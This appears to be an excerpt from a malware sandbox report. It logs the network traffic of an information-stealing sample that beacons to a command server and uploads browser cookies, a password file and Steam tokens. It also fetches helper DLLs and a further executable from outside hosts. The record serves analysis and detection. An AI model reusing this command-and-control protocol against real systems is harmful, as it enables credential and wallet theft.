e0 79 69 6e 73 6f 63 67 76 00 10 00 00 00 d0 4c 00 00 04 00 00 00 92 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 4c 00 00 22 00 00 00 96 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: GET /download/direct/79b47216-17a9-4db2-9e53-0d70fd5ed1e5/knotc.exe HTTP/1.1Host: store1.gofile.io
                      Source: global trafficHTTP traffic detected: GET /download/direct/79b47216-17a9-4db2-9e53-0d70fd5ed1e5/knotc.exe HTTP/1.1Host: file4.gofile.ioConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAKFCGIJKJKFHIDHIIIHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 42 44 32 41 32 30 46 30 45 35 34 33 32 30 37 36 30 33 31 36 34 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 2d 2d 0d 0a Data Ascii: ------HDAKFCGIJKJKFHIDHIIIContent-Disposition: form-data; name="hwid"3BD2A20F0E543207603164------HDAKFCGIJKJKFHIDHIIIContent-Disposition: form-data; name="build"mars------HDAKFCGIJKJKFHIDHIII--
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAEHIEBGHDAFIEBGIEHJHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 45 48 49 45 42 47 48 44 41 46 49 45 42 47 49 45 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 61 33 61 35 34 64 63 36 34 66 61 61 64 36 66 38 66 36 33 65 66 36 31 32 61 30 62 63 39 38 31 33 32 37 33 38 31 66 39 61 33 64 39 30 36 32 64 30 34 38 37 39 37 64 33 65 64 35 39 32 63 34 64 39 66 63 66 64 64 32 35 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 48 49 45 42 47 48 44 41 46 49 45 42 47 49 45 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 48 49 45 42 47 48 44 41 46 49 45 42 47 49 45 48 4a 2d 2d 0d 0a Data Ascii: ------BAEHIEBGHDAFIEBGIEHJContent-Disposition: form-data; name="token"8a3a54dc64faad6f8f63ef612a0bc981327381f9a3d9062d048797d3ed592c4d9fcfdd25------BAEHIEBGHDAFIEBGIEHJContent-Disposition: form-data; name="message"browsers------BAEHIEBGHDAFIEBGIEHJ--
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDBFBGIDHCAAKEBAKFIHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 44 42 46 42 47 49 44 48 43 41 41 4b 45 42 41 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 61 33 61 35 34 64 63 36 34 66 61 61 64 36 66 38 66 36 33 65 66 36 31 32 61 30 62 63 39 38 31 33 32 37 33 38 31 66 39 61 33 64 39 30 36 32 64 30 34 38 37 39 37 64 33 65 64 35 39 32 63 34 64 39 66 63 66 64 64 32 35 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 42 46 42 47 49 44 48 43 41 41 4b 45 42 41 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 42 46 42 47 49 44 48 43 41 41 4b 45 42 41 4b 46 49 2d 2d 0d 0a Data Ascii: ------CGDBFBGIDHCAAKEBAKFIContent-Disposition: form-data; name="token"8a3a54dc64faad6f8f63ef612a0bc981327381f9a3d9062d048797d3ed592c4d9fcfdd25------CGDBFBGIDHCAAKEBAKFIContent-Disposition: form-data; name="message"plugins------CGDBFBGIDHCAAKEBAKFI--
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEGDBKFIJDAKFIDGHJEHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 47 44 42 4b 46 49 4a 44 41 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 61 33 61 35 34 64 63 36 34 66 61 61 64 36 66 38 66 36 33 65 66 36 31 32 61 30 62 63 39 38 31 33 32 37 33 38 31 66 39 61 33 64 39 30 36 32 64 30 34 38 37 39 37 64 33 65 64 35 39 32 63 34 64 39 66 63 66 64 64 32 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 47 44 42 4b 46 49 4a 44 41 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 47 44 42 4b 46 49 4a 44 41 4b 46 49 44 47 48 4a 45 2d 2d 0d 0a Data Ascii: ------KJEGDBKFIJDAKFIDGHJEContent-Disposition: form-data; name="token"8a3a54dc64faad6f8f63ef612a0bc981327381f9a3d9062d048797d3ed592c4d9fcfdd25------KJEGDBKFIJDAKFIDGHJEContent-Disposition: form-data; name="message"fplugins------KJEGDBKFIJDAKFIDGHJE--
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKKECBKKECGCAAAEHJKHost: 185.215.113.206Content-Length: 7539Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKKECBKKECGCAAAEHJKHost: 185.215.113.206Content-Length: 427Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 61 33 61 35 34 64 63 36 34 66 61 61 64 36 66 38 66 36 33 65 66 36 31 32 61 30 62 63 39 38 31 33 32 37 33 38 31 66 39 61 33 64 39 30 36 32 64 30 34 38 37 39 37 64 33 65 64 35 39 32 63 34 64 39 66 63 66 64 64 32 35 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 2d 2d 0d 0a Data Ascii: ------AKKKECBKKECGCAAAEHJKContent-Disposition: form-data; name="token"8a3a54dc64faad6f8f63ef612a0bc981327381f9a3d9062d048797d3ed592c4d9fcfdd25------AKKKECBKKECGCAAAEHJKContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------AKKKECBKKECGCAAAEHJKContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------AKKKECBKKECGCAAAEHJK--
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDGCGDBGCAAEBFIECGHHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 61 33 61 35 34 64 63 36 34 66 61 61 64 36 66 38 66 36 33 65 66 36 31 32 61 30 62 63 39 38 31 33 32 37 33 38 31 66 39 61 33 64 39 30 36 32 64 30 34 38 37 39 37 64 33 65 64 35 39 32 63 34 64 39 66 63 66 64 64 32 35 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 2d 2d 0d 0a Data Ascii: ------HJDGCGDBGCAAEBFIECGHContent-Disposition: form-data; name="token"8a3a54dc64faad6f8f63ef612a0bc981327381f9a3d9062d048797d3ed592c4d9fcfdd25------HJDGCGDBGCAAEBFIECGHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HJDGCGDBGCAAEBFIECGHContent-Disposition: form-data; name="file"------HJDGCGDBGCAAEBFIECGH--
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCAFCAFHJJDBFIECFBKEHost: 185.215.113.206Content-Length: 431Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 61 33 61 35 34 64 63 36 34 66 61 61 64 36 66 38 66 36 33 65 66 36 31 32 61 30 62 63 39 38 31 33 32 37 33 38 31 66 39 61 33 64 39 30 36 32 64 30 34 38 37 39 37 64 33 65 64 35 39 32 63 34 64 39 66 63 66 64 64 32 35 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 4e 61 57 4e 79 62 33 4e 76 5a 6e 51 67 52 57 52 6e 5a 56 39 45 5a 57 5a 68 64 57 78 30 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 2d 2d 0d 0a Data Ascii: ------GCAFCAFHJJDBFIECFBKEContent-Disposition: form-data; name="token"8a3a54dc64faad6f8f63ef612a0bc981327381f9a3d9062d048797d3ed592c4d9fcfdd25------GCAFCAFHJJDBFIECFBKEContent-Disposition: form-data; name="file_name"Y29va2llc1xNaWNyb3NvZnQgRWRnZV9EZWZhdWx0LnR4dA==------GCAFCAFHJJDBFIECFBKEContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------GCAFCAFHJJDBFIECFBKE--
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFBGIDAEHCFIDGCBGIIHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 46 42 47 49 44 41 45 48 43 46 49 44 47 43 42 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 61 33 61 35 34 64 63 36 34 66 61 61 64 36 66 38 66 36 33 65 66 36 31 32 61 30 62 63 39 38 31 33 32 37 33 38 31 66 39 61 33 64 39 30 36 32 64 30 34 38 37 39 37 64 33 65 64 35 39 32 63 34 64 39 66 63 66 64 64 32 35 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 47 49 44 41 45 48 43 46 49 44 47 43 42 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 47 49 44 41 45 48 43 46 49 44 47 43 42 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 47 49 44 41 45 48 43 46 49 44 47 43 42 47 49 49 2d 2d 0d 0a Data Ascii: ------FCFBGIDAEHCFIDGCBGIIContent-Disposition: form-data; name="token"8a3a54dc64faad6f8f63ef612a0bc981327381f9a3d9062d048797d3ed592c4d9fcfdd25------FCFBGIDAEHCFIDGCBGIIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FCFBGIDAEHCFIDGCBGIIContent-Disposition: form-data; name="file"------FCFBGIDAEHCFIDGCBGII--
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIEHIIIJDAAAAAAKECBHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKFBAECBAEGDGDHIEHIHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 61 33 61 35 34 64 63 36 34 66 61 61 64 36 66 38 66 36 33 65 66 36 31 32 61 30 62 63 39 38 31 33 32 37 33 38 31 66 39 61 33 64 39 30 36 32 64 30 34 38 37 39 37 64 33 65 64 35 39 32 63 34 64 39 66 63 66 64 64 32 35 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 2d 2d 0d 0a Data Ascii: ------CBKFBAECBAEGDGDHIEHIContent-Disposition: form-data; name="token"8a3a54dc64faad6f8f63ef612a0bc981327381f9a3d9062d048797d3ed592c4d9fcfdd25------CBKFBAECBAEGDGDHIEHIContent-Disposition: form-data; name="message"wallets------CBKFBAECBAEGDGDHIEHI--
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCGCAAKJDHJJJJJKKKFBHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 47 43 41 41 4b 4a 44 48 4a 4a 4a 4a 4a 4b 4b 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 61 33 61 35 34 64 63 36 34 66 61 61 64 36 66 38 66 36 33 65 66 36 31 32 61 30 62 63 39 38 31 33 32 37 33 38 31 66 39 61 33 64 39 30 36 32 64 30 34 38 37 39 37 64 33 65 64 35 39 32 63 34 64 39 66 63 66 64 64 32 35 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 41 41 4b 4a 44 48 4a 4a 4a 4a 4a 4b 4b 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 41 41 4b 4a 44 48 4a 4a 4a 4a 4a 4b 4b 4b 46 42 2d 2d 0d 0a Data Ascii: ------HCGCAAKJDHJJJJJKKKFBContent-Disposition: form-data; name="token"8a3a54dc64faad6f8f63ef612a0bc981327381f9a3d9062d048797d3ed592c4d9fcfdd25------HCGCAAKJDHJJJJJKKKFBContent-Disposition: form-data; name="message"files------HCGCAAKJDHJJJJJKKKFB--
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAECFHJEBAAFIEBGHIIEHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 45 43 46 48 4a 45 42 41 41 46 49 45 42 47 48 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 61 33 61 35 34 64 63 36 34 66 61 61 64 36 66 38 66 36 33 65 66 36 31 32 61 30 62 63 39 38 31 33 32 37 33 38 31 66 39 61 33 64 39 30 36 32 64 30 34 38 37 39 37 64 33 65 64 35 39 32 63 34 64 39 66 63 66 64 64 32 35 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 43 46 48 4a 45 42 41 41 46 49 45 42 47 48 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 43 46 48 4a 45 42 41 41 46 49 45 42 47 48 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 43 46 48 4a 45 42 41 41 46 49 45 42 47 48 49 49 45 2d 2d 0d 0a Data Ascii: ------BAECFHJEBAAFIEBGHIIEContent-Disposition: form-data; name="token"8a3a54dc64faad6f8f63ef612a0bc981327381f9a3d9062d048797d3ed592c4d9fcfdd25------BAECFHJEBAAFIEBGHIIEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------BAECFHJEBAAFIEBGHIIEContent-Disposition: form-data; name="file"------BAECFHJEBAAFIEBGHIIE--
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAKFBGCBFHIJKECGIIJHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 4b 46 42 47 43 42 46 48 49 4a 4b 45 43 47 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 61 33 61 35 34 64 63 36 34 66 61 61 64 36 66 38 66 36 33 65 66 36 31 32 61 30 62 63 39 38 31 33 32 37 33 38 31 66 39 61 33 64 39 30 36 32 64 30 34 38 37 39 37 64 33 65 64 35 39 32 63 34 64 39 66 63 66 64 64 32 35 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 4b 46 42 47 43 42 46 48 49 4a 4b 45 43 47 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 4b 46 42 47 43 42 46 48 49 4a 4b 45 43 47 49 49 4a 2d 2d 0d 0a Data Ascii: ------HCAKFBGCBFHIJKECGIIJContent-Disposition: form-data; name="token"8a3a54dc64faad6f8f63ef612a0bc981327381f9a3d9062d048797d3ed592c4d9fcfdd25------HCAKFBGCBFHIJKECGIIJContent-Disposition: form-data; name="message"ybncbhylepme------HCAKFBGCBFHIJKECGIIJ--
                      Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCGHJDBFIIDGDHIJDBGHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 61 33 61 35 34 64 63 36 34 66 61 61 64 36 66 38 66 36 33 65 66 36 31 32 61 30 62 63 39 38 31 33 32 37 33 38 31 66 39 61 33 64 39 30 36 32 64 30 34 38 37 39 37 64 33 65 64 35 39 32 63 34 64 39 66 63 66 64 64 32 35 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 47 2d 2d 0d 0a Data Ascii: ------FHCGHJDBFIIDGDHIJDBGContent-Disposition: form-data; name="token"8a3a54dc64faad6f8f63ef612a0bc981327381f9a3d9062d048797d3ed592c4d9fcfdd25------FHCGHJDBFIIDGDHIJDBGContent-Disposition: form-data; name="message"wkkjqaiaxkhb------FHCGHJDBFIIDGDHIJDBG--
